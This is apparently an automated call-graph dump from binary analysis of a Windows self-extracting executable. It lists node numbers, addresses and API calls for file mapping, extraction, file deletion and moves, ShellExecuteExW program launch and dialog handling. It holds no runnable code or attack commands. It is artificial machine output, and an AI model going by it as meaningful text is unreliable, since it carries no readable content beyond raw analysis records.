23907->23892 23908->23850 23917 d24092 _swprintf 51 API calls 23909->23917 23911 d3bed0 23910->23911 23918 d24092 _swprintf 51 API calls 23911->23918 23921 d2e617 53 API calls 23912->23921 23913 d3c169 24110 d39ed5 32 API calls 23913->24110 23914->23824 23914->23912 24103 d2f28c 82 API calls 23915->24103 23924 d3bac7 23917->23924 23918->23886 23928 d3bd05 23921->23928 23922->23896 23929 d3c73f 97 API calls 23922->23929 23923 d3bd66 24013 d212f1 GetDlgItem ShowWindow 23923->24013 23997 d2966e 23924->23997 23925 d2e617 53 API calls 23925->23931 23926 d3c188 23926->23877 23927 d3bb5f 23932 d24092 _swprintf 51 API calls 23927->23932 23933 d24092 _swprintf 51 API calls 23928->23933 23934 d3c0a0 23929->23934 23931->23877 23931->23913 23931->23925 23936 d3bb81 CreateFileMappingW 23932->23936 23937 d3bd23 23933->23937 23934->23896 23938 d3c0a9 DialogBoxParamW 23934->23938 23935 d3bd70 23939 d2e617 53 API calls 23935->23939 23941 d3bbe3 GetCommandLineW 23936->23941 23974 d3bc60 __InternalCxxFrameHandler 23936->23974 23951 d2e617 53 API calls 23937->23951 23938->23824 23938->23896 23942 d3bd7a SetDlgItemTextW 23939->23942 23944 d3bbf4 23941->23944 24014 d212f1 GetDlgItem ShowWindow 23942->24014 23943 d3baed 23947 d3baff 23943->23947 23948 d3baf4 GetLastError 23943->23948 24104 d3b425 SHGetMalloc 23944->24104 23945 d3bc6b ShellExecuteExW 23969 d3bc88 23945->23969 24005 d2959a 23947->24005 23948->23947 23954 d3bd3d 23951->23954 23952 d3bd8c SetDlgItemTextW GetDlgItem 23955 d3bdc1 23952->23955 23956 d3bda9 GetWindowLongW SetWindowLongW 23952->23956 23953 d3bc10 24105 d3b425 SHGetMalloc 23953->24105 24015 d3c73f 23955->24015 23956->23955 23960 d3bc1c 24106 d3b425 SHGetMalloc 23960->24106 23961 d3bccb 23961->23914 23967 d3bce1 UnmapViewOfFile CloseHandle 23961->23967 23962 d3c73f 97 API calls 23964 d3bddd 23962->23964 24040 d3da52 23964->24040 23965 d3bc28 24107 d2f3fa 82 API calls 2 library calls 23965->24107 23967->23914 23969->23961 23972 d3bcb7 Sleep 23969->23972 23971 d3bc3f MapViewOfFile 23971->23974 23972->23961 23972->23969 23973 d3c73f 97 API calls 23977 d3be03 23973->23977 23974->23945 23975 d3be2c 24108 d212d3 GetDlgItem EnableWindow 23975->24108 23977->23975 23979 d3c73f 97 API calls 23977->23979 23978->23824 23978->23847 23979->23975 23981 d21378 23980->23981 23984 d2131f 23980->23984 24114 d2e2c1 GetWindowLongW SetWindowLongW 23981->24114 23983 d21385 23983->23816 23983->23817 23983->23818 23984->23983 24113 d2e2e8 62 API calls 2 library calls 23984->24113 23986 d21341 23986->23983 23987 d21354 GetDlgItem 23986->23987 23987->23983 23988 d21364 23987->23988 23988->23983 23989 d2136a SetWindowTextW 23988->23989 23989->23983 23992 d2a0bb 23990->23992 23991 d2a175 23991->23880 23991->23881 23992->23991 23993 d2a14c 23992->23993 24115 d2a2b2 23992->24115 23993->23991 23994 d2a2b2 8 API calls 23993->23994 23994->23991 23996->23889 23998 d29678 23997->23998 23999 d296d5 CreateFileW 23998->23999 24000 d296c9 23998->24000 23999->24000 24001 d2971f 24000->24001 24002 d2bb03 GetCurrentDirectoryW 24000->24002 24001->23943 24003 d29704 24002->24003 24003->24001 24004 d29708 CreateFileW 24003->24004 24004->24001 24006 d295cf 24005->24006 24007 d295be 24005->24007 24006->23899 24007->24006 24008 d295d1 24007->24008 24009 d295ca 24007->24009 24141 d29620 24008->24141 24136 d2974e 24009->24136 24012->23923 24013->23935 24014->23952 24016 d3c749 __EH_prolog 24015->24016 24017 d3bdcf 24016->24017 24018 d3b314 ExpandEnvironmentStringsW 24016->24018 24017->23962 24026 d3c780 _wcslen _wcsrchr 24018->24026 24020 d3b314 ExpandEnvironmentStringsW 24020->24026 24021 d3ca67 SetWindowTextW 24021->24026 24024 d43e3e 22 API calls 24024->24026 24026->24017 24026->24020 24026->24021 24026->24024 24027 d3c855 SetFileAttributesW 24026->24027 24032 d3cc31 GetDlgItem SetWindowTextW SendMessageW 24026->24032 24035 d3cc71 SendMessageW 24026->24035 24156 d31fbb CompareStringW 24026->24156 24157 d3a64d GetCurrentDirectoryW 24026->24157 24159 d2a5d1 6 API calls 24026->24159 24160 d2a55a FindClose 24026->24160 24161 d3b48e 76 API calls 2 library calls 24026->24161 24028 d3c90f GetFileAttributesW 24027->24028 24039 d3c86f __cftof _wcslen 24027->24039 24028->24026 24031 d3c921 DeleteFileW 24028->24031 24031->24026 24033 d3c932 24031->24033 24032->24026 24034 d24092 _swprintf 51 API calls 24033->24034 24036 d3c952 GetFileAttributesW 24034->24036 24035->24026 24036->24033 24037 d3c967 MoveFileW 24036->24037 24037->24026 24038 d3c97f MoveFileExW 24037->24038 24038->24026 24039->24026 24039->24028 24158 d2b991 51 API calls 2 library calls 24039->24158 24041 d3da5c __EH_prolog 24040->24041 24162 d30659 24041->24162 24043 d3da8d 24166 d25b3d 24043->24166 24045 d3daab 24170 d27b0d 24045->24170 24049 d3dafe 24186 d27b9e 24049->24186 24051 d3bdee 24051->23973 24053 d3d6a8 24052->24053 24661 d3a5c6 24053->24661 24056 d3bf15 24056->23826 24056->23827 24057 d3d6b5 GetWindow 24057->24056 24060 d3d6d5 24057->24060 24058 d3d6e2 GetClassNameW 24666 d31fbb CompareStringW 24058->24666 24060->24056 24060->24058 24061 d3d706 GetWindowLongW 24060->24061 24062 d3d76a GetWindow 24060->24062 24061->24062 24063 d3d716 SendMessageW 24061->24063 24062->24056 24062->24060 24063->24062 24064 d3d72c GetObjectW 24063->24064 24667 d3a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24064->24667 24066 d3d743 24668 d3a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24066->24668 24669 d3a80c 8 API calls 24066->24669 24069 d3d754 SendMessageW DeleteObject 24069->24062 24070->23837 24072 d3abf1 24071->24072 24073 d3abcc 24071->24073 24075 d3abf6 SHAutoComplete 24072->24075 24076 d3abff 24072->24076 24672 d31fbb CompareStringW 24073->24672 24075->24076 24079 d3b093 24076->24079 24077 d3abdf 24077->24072 24078 d3abe3 FindWindowExW 24077->24078 24078->24072 24080 d3b09d __EH_prolog 24079->24080 24081 d213dc 84 API calls 24080->24081 24082 d3b0bf 24081->24082 24673 d21fdc 24082->24673 24085 d3b0eb 24088 d219af 128 API calls 24085->24088 24086 d3b0d9 24087 d21692 86 API calls 24086->24087 24089 d3b0e4 24087->24089 24090 d3b10d __InternalCxxFrameHandler ___std_exception_copy 24088->24090 24089->23867 24089->23869 24091 d21692 86 API calls 24090->24091 24091->24089 24092->23850 24094 d3b568 5 API calls 24093->24094 24095 d3d4e0 GetDlgItem 24094->24095 24096 d3d502 24095->24096 24097 d3d536 SendMessageW SendMessageW 24095->24097 24100 d3d50d ShowWindow SendMessageW SendMessageW 24096->24100 24098 d3d572 24097->24098 24099 d3d591 SendMessageW SendMessageW SendMessageW 24097->24099 24098->24099 24101 d3d5e7 SendMessageW 24099->24101 24102 d3d5c4 SendMessageW 24099->24102 24100->24097 24101->23870 24102->24101 24103->23927 24104->23953 24105->23960 24106->23965 24107->23971 24108->23978 24109->23905 24110->23926 24111->23901 24112->23891 24113->23986 24114->23983 24116 d2a2bf 24115->24116 24117 d2a2e3 24116->24117 24118 d2a2d6 CreateDirectoryW 24116->24118 24119 d2a231 3 API calls 24117->24119 24118->24117 24121 d2a316 24118->24121 24120 d2a2e9 24119->24120 24122 d2a329 GetLastError 24120->24122 24124 d2bb03 GetCurrentDirectoryW 24120->24124 24123 d2a325 24121->24123 24128 d2a4ed 24121->24128 24122->24123 24123->23992 24126 d2a2ff 24124->24126 24126->24122 24127 d2a303 CreateDirectoryW 24126->24127 24127->24121 24127->24122 24129 d3ec50 24128->24129 24130 d2a4fa SetFileAttributesW 24129->24130 24131 d2a510 24130->24131 24132 d2a53d 24130->24132 24133 d2bb03 GetCurrentDirectoryW 24131->24133 24132->24123 24134 d2a524 24133->24134 24134->24132 24135 d2a528 SetFileAttributesW 24134->24135 24135->24132 24137 d29781 24136->24137 24138 d29757 24136->24138 24137->24006 24138->24137 24147 d2a1e0 24138->24147 24142 d2964a 24141->24142 24143 d2962c 24141->24143 24144 d29669 24142->24144 24155 d26bd5 76 API calls 24142->24155 24143->24142 24145 d29638 CloseHandle 24143->24145 24144->24006 24145->24142 24148 d3ec50 24147->24148 24149 d2a1ed DeleteFileW 24148->24149 24150 d2a200 24149->24150 24151 d2977f 24149->24151 24152 d2bb03 GetCurrentDirectoryW 24150->24152 24151->24006 24153 d2a214 24152->24153 24153->24151 24154 d2a218 DeleteFileW 24153->24154 24154->24151 24155->24144 24156->24026 24157->24026 24158->24039 24159->24026 24160->24026 24161->24026 24163 d30666 _wcslen 24162->24163 24190 d217e9 24163->24190 24165 d3067e 24165->24043 24167 d30659 _wcslen 24166->24167 24168 d217e9 78 API calls 24167->24168 24169 d3067e 24168->24169 24169->24045 24171 d27b17 __EH_prolog 24170->24171 24207 d2ce40 24171->24207 24173 d27b32 24213 d3eb38 24173->24213 24175 d27b5c 24222 d34a76 24175->24222 24178 d27c7d 24180 d27c87 24178->24180 24181 d27cf1 24180->24181 24254 d2a56d 24180->24254 24183 d27d50 24181->24183 24232 d28284 24181->24232 24182 d27d92 24182->24049 24183->24182 24260 d2138b 74 API calls 24183->24260 24187 d27bac 24186->24187 24189 d27bb3 24186->24189 24188 d32297 86 API calls 24187->24188 24188->24189 24191 d217ff 24190->24191 24202 d2185a __InternalCxxFrameHandler 24190->24202 24192 d21828 24191->24192 24203 d26c36 76 API calls __vswprintf_c_l 24191->24203 24194 d21887 24192->24194 24199 d21847 ___std_exception_copy 24192->24199 24196 d43e3e 22 API calls 24194->24196 24195 d2181e 24204 d26ca7 75 API calls 24195->24204 24198 d2188e 24196->24198 24198->24202 24206 d26ca7 75 API calls 24198->24206 24199->24202 24205 d26ca7 75 API calls 24199->24205 24202->24165 24203->24195 24204->24192 24205->24202 24206->24202 24208 d2ce4a __EH_prolog 24207->24208 24209 d3eb38 8 API calls 24208->24209 24210 d2ce8d 24209->24210 24211 d3eb38 8 API calls 24210->24211 24212 d2ceb1 24211->24212 24212->24173 24215 d3eb3d ___std_exception_copy 24213->24215 24214 d3eb57 24214->24175 24215->24214 24218 d3eb59 24215->24218 24228 d47a5e 7 API calls 2 library calls 24215->24228 24217 d3f5c9 24230 d4238d RaiseException 24217->24230 24218->24217 24229 d4238d RaiseException 24218->24229 24220 d3f5e6 24223 d34a80 __EH_prolog 24222->24223 24224 d3eb38 8 API calls 24223->24224 24225 d34a9c 24224->24225 24226 d27b8b 24225->24226 24231 d30e46 80 API calls 24225->24231 24226->24178 24228->24215 24229->24217 24230->24220 24231->24226 24233 d2828e __EH_prolog 24232->24233 24261 d213dc 24233->24261 24235 d282aa 24236 d282bb 24235->24236 24404 d29f42 24235->24404 24240 d282f2 24236->24240 24269 d21a04 24236->24269 24400 d21692 24240->24400 24242 d28389 24288 d28430 24242->24288 24245 d283e8 24296 d21f6d 24245->24296 24249 d283f3 24249->24240 24300 d23b2d 24249->24300 24312 d2848e 24249->24312 24251 d2a56d 7 API calls 24252 d282ee 24251->24252 24252->24240 24252->24242 24252->24251 24408 d2c0c5 CompareStringW _wcslen 24252->24408 24255 d2a582 24254->24255 24256 d2a5b0 24255->24256 24650 d2a69b 24255->24650 24256->24180 24258 d2a592 24258->24256 24259 d2a597 FindClose 24258->24259 24259->24256 24260->24182 24262 d213e1 __EH_prolog 24261->24262 24263 d2ce40 8 API calls 24262->24263 24264 d21419 24263->24264 24265 d3eb38 8 API calls 24264->24265 24268 d21474 __cftof 24264->24268 24266 d21461 24265->24266 24267 d2b505 84 API calls 24266->24267 24266->24268 24267->24268 24268->24235 24270 d21a0e __EH_prolog 24269->24270 24282 d21a61 24270->24282 24284 d21b9b 24270->24284 24409 d213ba 24270->24409 24272 d21bc7 24412 d2138b 74 API calls 24272->24412 24275 d23b2d 101 API calls 24279 d21c12 24275->24279 24276 d21bd4 24276->24275 24276->24284 24277 d21c5a 24280 d21c8d 24277->24280 24277->24284 24413 d2138b 74 API calls 24277->24413 24279->24277 24281 d23b2d 101 API calls 24279->24281 24280->24284 24286 d29e80 79 API calls 24280->24286 24281->24279 24282->24272 24282->24276 24282->24284 24283 d23b2d 101 API calls 24285 d21cde 24283->24285 24284->24252 24285->24283 24285->24284 24286->24285 24287 d29e80 79 API calls 24287->24282 24431 d2cf3d 24288->24431 24290 d28440 24435 d313d2 GetSystemTime SystemTimeToFileTime 24290->24435 24292 d283a3 24292->24245 24293 d31b66 24292->24293 24436 d3de6b 24293->24436 24297 d21f72 __EH_prolog 24296->24297 24299 d21fa6 24297->24299 24444 d219af 24297->24444 24299->24249 24301 d23b39 24300->24301 24302 d23b3d 24300->24302 24301->24249 24311 d29e80 79 API calls 24302->24311 24303 d23b4f 24304 d23b6a 24303->24304 24305 d23b78 24303->24305 24306 d23baa 24304->24306 24576 d232f7 89 API calls 2 library calls 24304->24576 24577 d2286b 101 API calls 3 library calls 24305->24577 24306->24249 24309 d23b76 24309->24306 24578 d220d7 74 API calls 24309->24578 24311->24303 24313 d28498 __EH_prolog 24312->24313 24318 d284d5 24313->24318 24327 d28513 24313->24327 24603 d38c8d 103 API calls 24313->24603 24314 d284f5 24316 d284fa 24314->24316 24317 d2851c 24314->24317 24316->24327 24604 d27a0d 152 API calls 24316->24604 24317->24327 24605 d38c8d 103 API calls 24317->24605 24318->24314 24319 d2857a 24318->24319 24318->24327 24319->24327 24579 d25d1a 24319->24579 24323 d28605 24323->24327 24585 d28167 24323->24585 24326 d28797 24328 d2a56d 7 API calls 24326->24328 24329 d28802 24326->24329 24327->24249 24328->24329 24591 d27c0d 24329->24591 24331 d2d051 82 API calls 24337 d2885d 24331->24337 24332 d2898b 24608 d22021 74 API calls 24332->24608 24333 d28a5f 24338 d28ab6 24333->24338 24353 d28a6a 24333->24353 24334 d28992 24334->24333 24342 d289e1 24334->24342 24337->24327 24337->24331 24337->24332 24337->24334 24606 d28117 84 API calls 24337->24606 24607 d22021 74 API calls 24337->24607 24345 d28a4c 24338->24345 24611 d27fc0 97 API calls 24338->24611 24339 d29105 24344 d2959a 80 API calls 24339->24344 24340 d28b14 24340->24339 24360 d28b82 24340->24360 24612 d298bc 24340->24612 24341 d28ab4 24346 d2959a 80 API calls 24341->24346 24342->24340 24342->24345 24347 d2a231 3 API calls 24342->24347 24344->24327 24345->24340 24345->24341 24346->24327 24348 d28a19 24347->24348 24348->24345 24609 d292a3 97 API calls 24348->24609 24349 d2ab1a 8 API calls 24351 d28bd1 24349->24351 24355 d2ab1a 8 API calls 24351->24355 24353->24341 24610 d27db2 101 API calls 24353->24610 24371 d28be7 24355->24371 24358 d28b70 24616 d26e98 77 API calls 24358->24616 24360->24349 24361 d28e40 24366 d28e52 24361->24366 24367 d28e66 24361->24367 24386 d28d49 24361->24386 24362 d28d18 24364 d28d8a 24362->24364 24365 d28d28 24362->24365 24363 d28cbc 24363->24361 24363->24362 24373 d28167 19 API calls 24364->24373 24368 d28d6e 24365->24368 24377 d28d37 24365->24377 24369 d29215 123 API calls 24366->24369 24370 d33377 75 API calls 24367->24370 24368->24386 24619 d277b8 111 API calls 24368->24619 24369->24386 24374 d28e7f 24370->24374 24371->24363 24372 d28c93 24371->24372 24380 d2981a 79 API calls 24371->24380 24372->24363 24617 d29a3c 82 API calls 24372->24617 24378 d28dbd 24373->24378 24622 d33020 123 API calls 24374->24622 24618 d22021 74 API calls 24377->24618 24382 d28de6 24378->24382 24383 d28df5 24378->24383 24378->24386 24380->24372 24620 d27542 85 API calls 24382->24620 24621 d29155 93 API calls __EH_prolog 24383->24621 24389 d28f85 24386->24389 24623 d22021 74 API calls 24386->24623 24388 d29090 24388->24339 24391 d2a4ed 3 API calls 24388->24391 24389->24339 24389->24388 24390 d2903e 24389->24390 24597 d29f09 SetEndOfFile 24389->24597 24598 d29da2 24390->24598 24392 d290eb 24391->24392 24392->24339 24624 d22021 74 API calls 24392->24624 24395 d29085 24397 d29620 77 API calls 24395->24397 24397->24388 24398 d290fb 24625 d26dcb 76 API calls 24398->24625 24401 d216a4 24400->24401 24641 d2cee1 24401->24641 24405 d29f59 24404->24405 24406 d29f63 24405->24406 24649 d26d0c 78 API calls 24405->24649 24406->24236 24408->24252 24414 d21732 24409->24414 24411 d213d6 24411->24287 24412->24284 24413->24280 24415 d21748 24414->24415 24426 d217a0 __InternalCxxFrameHandler 24414->24426 24416 d21771 24415->24416 24427 d26c36 76 API calls __vswprintf_c_l 24415->24427 24418 d217c7 24416->24418 24423 d2178d ___std_exception_copy 24416->24423 24420 d43e3e 22 API calls 24418->24420 24419 d21767 24428 d26ca7 75 API calls 24419->24428 24422 d217ce 24420->24422 24422->24426 24430 d26ca7 75 API calls 24422->24430 24423->24426 24429 d26ca7 75 API calls 24423->24429 24426->24411 24427->24419 24428->24416 24429->24426 24430->24426 24432 d2cf4d 24431->24432 24434 d2cf54 24431->24434 24433 d2981a 79 API calls 24432->24433 24433->24434 24434->24290 24435->24292 24437 d3de78 24436->24437 24438 d2e617 53 API calls 24437->24438 24439 d3de9b 24438->24439 24440 d24092 _swprintf 51 API calls 24439->24440 24441 d3dead 24440->24441 24442 d3d4d4 16 API calls 24441->24442 24443 d31b7c 24442->24443 24443->24245 24445 d219bf 24444->24445 24448 d219bb 24444->24448 24449 d29e80 79 API calls 24445->24449 24446 d219d4 24450 d218f6 24446->24450 24448->24299 24449->24446 24451 d21908 24450->24451 24452 d21945 24450->24452 24453 d23b2d 101 API calls 24451->24453 24458 d23fa3 24452->24458 24456 d21928 24453->24456 24456->24448 24460 d23fac 24458->24460 24459 d23b2d 101 API calls 24459->24460 24460->24459 24462 d21966 24460->24462 24475 d30e08 24460->24475 24462->24456 24463 d21e50 24462->24463 24464 d21e5a __EH_prolog 24463->24464 24483 d23bba 24464->24483 24466 d21e84 24467 d21732 78 API calls 24466->24467 24469 d21f0b 24466->24469 24468 d21e9b 24467->24468 24511 d218a9 78 API calls 24468->24511 24469->24456 24471 d21eb3 24473 d21ebf _wcslen 24471->24473 24512 d31b84 MultiByteToWideChar 24471->24512 24513 d218a9 78 API calls 24473->24513 24476 d30e0f 24475->24476 24477 d30e2a 24476->24477 24481 d26c31 RaiseException _com_raise_error 24476->24481 24479 d30e3b SetThreadExecutionState 24477->24479 24482 d26c31 RaiseException _com_raise_error 24477->24482 24479->24460 24481->24477 24482->24479 24484 d23bc4 __EH_prolog 24483->24484 24485 d23bf6 24484->24485 24486 d23bda 24484->24486 24488 d23e51 24485->24488 24491 d23c22 24485->24491 24539 d2138b 74 API calls 24486->24539 24556 d2138b 74 API calls 24488->24556 24490 d23be5 24490->24466 24491->24490 24514 d33377 24491->24514 24493 d23ca3 24494 d23d2e 24493->24494 24510 d23c9a 24493->24510 24542 d2d051 24493->24542 24524 d2ab1a 24494->24524 24495 d23c9f 24495->24493 24541 d220bd 78 API calls 24495->24541 24497 d23c71 24497->24493 24497->24495 24498 d23c8f 24497->24498 24540 d2138b 74 API calls 24498->24540 24500 d23d41 24504 d23dd7 24500->24504 24505 d23dc7 24500->24505 24548 d33020 123 API calls 24504->24548 24528 d29215 24505->24528 24508 d23dd5 24508->24510 24549 d22021 74 API calls 24508->24549 24550 d32297 24510->24550 24511->24471 24512->24473 24513->24469 24515 d3338c 24514->24515 24517 d33396 ___std_exception_copy 24514->24517 24557 d26ca7 75 API calls 24515->24557 24518 d334c6 24517->24518 24519 d3341c 24517->24519 24523 d33440 __cftof 24517->24523 24559 d4238d RaiseException 24518->24559 24558 d332aa 75 API calls 3 library calls 24519->24558 24522 d334f2 24523->24497 24525 d2ab28 24524->24525 24527 d2ab32 24524->24527 24526 d3eb38 8 API calls 24525->24526 24526->24527 24527->24500 24529 d2921f __EH_prolog 24528->24529 24560 d27c64 24529->24560 24532 d213ba 78 API calls 24533 d29231 24532->24533 24563 d2d114 24533->24563 24535 d29243 24536 d2928a 24535->24536 24538 d2d114 118 API calls 24535->24538 24572 d2d300 97 API calls __InternalCxxFrameHandler 24535->24572 24536->24508 24538->24535 24539->24490 24540->24510 24541->24493 24543 d2d072 24542->24543 24544 d2d084 24542->24544 24573 d2603a 82 API calls 24543->24573 24574 d2603a 82 API calls 24544->24574 24547 d2d07c 24547->24494 24548->24508 24549->24510 24552 d322a1 24550->24552 24551 d322ba 24575 d30eed 86 API calls 24551->24575 24552->24551 24555 d322ce 24552->24555 24554 d322c1 24554->24555 24556->24490 24557->24517 24558->24523 24559->24522 24561 d2b146 GetVersionExW 24560->24561 24562 d27c69 24561->24562 24562->24532 24569 d2d12a __InternalCxxFrameHandler 24563->24569 24564 d2d29a 24565 d2d2ce 24564->24565 24566 d2d0cb 6 API calls 24564->24566 24567 d30e08 SetThreadExecutionState RaiseException 24565->24567 24566->24565 24570 d2d291 24567->24570 24568 d38c8d 103 API calls 24568->24569 24569->24564 24569->24568 24569->24570 24571 d2ac05 91 API calls 24569->24571 24570->24535 24571->24569 24572->24535 24573->24547 24574->24547 24575->24554 24576->24309 24577->24309 24578->24306 24580 d25d2a 24579->24580 24626 d25c4b 24580->24626 24582 d25d5d 24584 d25d95 24582->24584 24631 d2b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24582->24631 24584->24323 24587 d28186 24585->24587 24586 d28232 24637 d31fac CharUpperW 24586->24637 24587->24586 24638 d2be5e 19 API calls __InternalCxxFrameHandler 24587->24638 24590 d2823b 24590->24326 24592 d27c22 24591->24592 24593 d27c5a 24592->24593 24639 d26e7a 74 API calls 24592->24639 24593->24337 24595 d27c52 24640 d2138b 74 API calls 24595->24640 24597->24390 24599 d29db3 24598->24599 24601 d29dc2 24598->24601 24600 d29db9 FlushFileBuffers 24599->24600 24599->24601 24600->24601 24602 d29e3f SetFileTime 24601->24602 24602->24395 24603->24318 24604->24327 24605->24327 24606->24337 24607->24337 24608->24334 24609->24345 24610->24341 24611->24345 24613 d28b5a 24612->24613 24614 d298c5 GetFileType 24612->24614 24613->24360 24615 d22021 74 API calls 24613->24615 24614->24613 24615->24358 24616->24360 24617->24363 24618->24386 24619->24386 24620->24386 24621->24386 24622->24386 24623->24389 24624->24398 24625->24339 24632 d25b48 24626->24632 24629 d25c6c 24629->24582 24630 d25b48 2 API calls 24630->24629 24631->24582 24633 d25b52 24632->24633 24635 d25c3a 24633->24635 24636 d2b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24633->24636 24635->24629 24635->24630 24636->24633 24637->24590 24638->24586 24639->24595 24640->24593 24642 d2cef2 24641->24642 24647 d2a99e 86 API calls 24642->24647 24644 d2cf24 24648 d2a99e 86 API calls 24644->24648 24646 d2cf2f 24647->24644 24648->24646 24649->24406 24651 d2a6a8 24650->24651 24652 d2a6c1 FindFirstFileW 24651->24652 24653 d2a727 FindNextFileW 24651->24653 24655 d2a6d0 24652->24655 24660 d2a709 24652->24660 24654 d2a732 GetLastError 24653->24654 24653->24660 24654->24660 24656 d2bb03 GetCurrentDirectoryW 24655->24656 24657 d2a6e0 24656->24657 24658 d2a6e4 FindFirstFileW 24657->24658 24659 d2a6fe GetLastError 24657->24659 24658->24659 24658->24660 24659->24660 24660->24258 24670 d3a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24661->24670 24663 d3a5cd 24664 d3a5d9 24663->24664 24671 d3a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24663->24671 24664->24056 24664->24057 24666->24060 24667->24066 24668->24066 24669->24069 24670->24663 24671->24664 24672->24077 24674 d29f42 78 API calls 24673->24674 24675 d21fe8 24674->24675 24676 d22005 24675->24676 24677 d21a04 101 API calls 24675->24677 24676->24085 24676->24086 24678 d21ff5 24677->24678 24678->24676 24680 d2138b 74 API calls 24678->24680 24680->24676 24681 d213e1 84 API calls 2 library calls 25299 d394e0 GetClientRect 25336 d321e0 26 API calls std::bad_exception::bad_exception 25362 d3f2e0 46 API calls __RTC_Initialize 24682 d3eae7 24683 d3eaf1 24682->24683 24684 d3e85d ___delayLoadHelper2@8 14 API calls 24683->24684 24685 d3eafe 24684->24685 25300 d3f4e7 29 API calls _abort 25363 d4bee0 GetCommandLineA GetCommandLineW 25337 d2f1e8 FreeLibrary 25302 d4b49d 6 API calls CatchGuardHandler 25338 d39580 6 API calls 25364 d3c793 102 API calls 4 library calls 25304 d3c793 97 API calls 4 library calls 25340 d3b18d 78 API calls 24709 d3f3b2 24710 d3f3be ___scrt_is_nonwritable_in_current_image 24709->24710 24741 d3eed7 24710->24741 24712 d3f3c5 24713 d3f518 24712->24713 24716 d3f3ef 24712->24716 24814 d3f838 4 API calls 2 library calls 24713->24814 24715 d3f51f 24807 d47f58 24715->24807 24728 d3f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24716->24728 24752 d48aed 24716->24752 24723 d3f40e 24725 d3f48f 24760 d3f953 GetStartupInfoW __cftof 24725->24760 24727 d3f495 24761 d48a3e 51 API calls 24727->24761 24728->24725 24810 d47af4 38 API calls 2 library calls 24728->24810 24731 d3f49d 24762 d3df1e 24731->24762 24735 d3f4b1 24735->24715 24736 d3f4b5 24735->24736 24737 d3f4be 24736->24737 24812 d47efb 28 API calls _abort 24736->24812 24813 d3f048 12 API calls ___scrt_uninitialize_crt 24737->24813 24740 d3f4c6 24740->24723 24742 d3eee0 24741->24742 24816 d3f654 IsProcessorFeaturePresent 24742->24816 24744 d3eeec 24817 d42a5e 24744->24817 24746 d3eef1 24747 d3eef5 24746->24747 24825 d48977 24746->24825 24747->24712 24750 d3ef0c 24750->24712 24755 d48b04 24752->24755 24753 d3fbbc CatchGuardHandler 5 API calls 24754 d3f408 24753->24754 24754->24723 24756 d48a91 24754->24756 24755->24753 24757 d48ac0 24756->24757 24758 d3fbbc CatchGuardHandler 5 API calls 24757->24758 24759 d48ae9 24758->24759 24759->24728 24760->24727 24761->24731 24876 d30863 24762->24876 24766 d3df3d 24925 d3ac16 24766->24925 24768 d3df46 __cftof 24769 d3df59 GetCommandLineW 24768->24769 24770 d3dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24769->24770 24771 d3df68 24769->24771 24772 d24092 _swprintf 51 API calls 24770->24772 24929 d3c5c4 24771->24929 24774 d3e04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24772->24774 24940 d3b6dd LoadBitmapW 24774->24940 24777 d3dfe0 24934 d3dbde 24777->24934 24778 d3df76 OpenFileMappingW 24781 d3dfd6 CloseHandle 24778->24781 24782 d3df8f MapViewOfFile 24778->24782 24781->24770 24783 d3dfa0 __InternalCxxFrameHandler 24782->24783 24784 d3dfcd UnmapViewOfFile 24782->24784 24789 d3dbde 2 API calls 24783->24789 24784->24781 24791 d3dfbc 24789->24791 24790 d390b7 8 API calls 24792 d3e0aa DialogBoxParamW 24790->24792 24791->24784 24793 d3e0e4 24792->24793 24794 d3e0f6 Sleep 24793->24794 24795 d3e0fd 24793->24795 24794->24795 24798 d3e10b 24795->24798 24970 d3ae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 24795->24970 24797 d3e12a DeleteObject 24799 d3e146 24797->24799 24800 d3e13f DeleteObject 24797->24800 24798->24797 24801 d3e177 24799->24801 24802 d3e189 24799->24802 24800->24799 24971 d3dc3b 6 API calls 24801->24971 24967 d3ac7c 24802->24967 24805 d3e17d CloseHandle 24805->24802 24806 d3e1c3 24811 d3f993 GetModuleHandleW 24806->24811 25103 d47cd5 24807->25103 24810->24725 24811->24735 24812->24737 24813->24740 24814->24715 24816->24744 24829 d43b07 24817->24829 24820 d42a67 24820->24746 24822 d42a6f 24823 d42a7a 24822->24823 24843 d43b43 DeleteCriticalSection 24822->24843 24823->24746 24872 d4c05a 24825->24872 24828 d42a7d 7 API calls 2 library calls 24828->24747 24830 d43b10 24829->24830 24832 d43b39 24830->24832 24833 d42a63 24830->24833 24844 d43d46 24830->24844 24849 d43b43 DeleteCriticalSection 24832->24849 24833->24820 24835 d42b8c 24833->24835 24865 d43c57 24835->24865 24839 d42baf 24840 d42bbc 24839->24840 24871 d42bbf 6 API calls ___vcrt_FlsFree 24839->24871 24840->24822 24842 d42ba1 24842->24822 24843->24820 24850 d43c0d 24844->24850 24847 d43d7e InitializeCriticalSectionAndSpinCount 24848 d43d69 24847->24848 24848->24830 24849->24833 24851 d43c4f 24850->24851 24852 d43c26 24850->24852 24851->24847 24851->24848 24852->24851 24857 d43b72 24852->24857 24855 d43c3b GetProcAddress 24855->24851 24856 d43c49 24855->24856 24856->24851 24863 d43b7e ___vcrt_InitializeCriticalSectionEx 24857->24863 24858 d43bf3 24858->24851 24858->24855 24859 d43b95 LoadLibraryExW 24860 d43bb3 GetLastError 24859->24860 24861 d43bfa 24859->24861 24860->24863 24861->24858 24862 d43c02 FreeLibrary 24861->24862 24862->24858 24863->24858 24863->24859 24864 d43bd5 LoadLibraryExW 24863->24864 24864->24861 24864->24863 24866 d43c0d ___vcrt_InitializeCriticalSectionEx 5 API calls 24865->24866 24867 d43c71 24866->24867 24868 d43c8a TlsAlloc 24867->24868 24869 d42b96 24867->24869 24869->24842 24870 d43d08 6 API calls ___vcrt_InitializeCriticalSectionEx 24869->24870 24870->24839 24871->24842 24873 d4c073 24872->24873 24874 d3fbbc CatchGuardHandler 5 API calls 24873->24874 24875 d3eefe 24874->24875 24875->24750 24875->24828 24877 d3ec50 24876->24877 24878 d3086d GetModuleHandleW 24877->24878 24879 d308e7 24878->24879 24880 d30888 GetProcAddress 24878->24880 24881 d30c14 GetModuleFileNameW 24879->24881 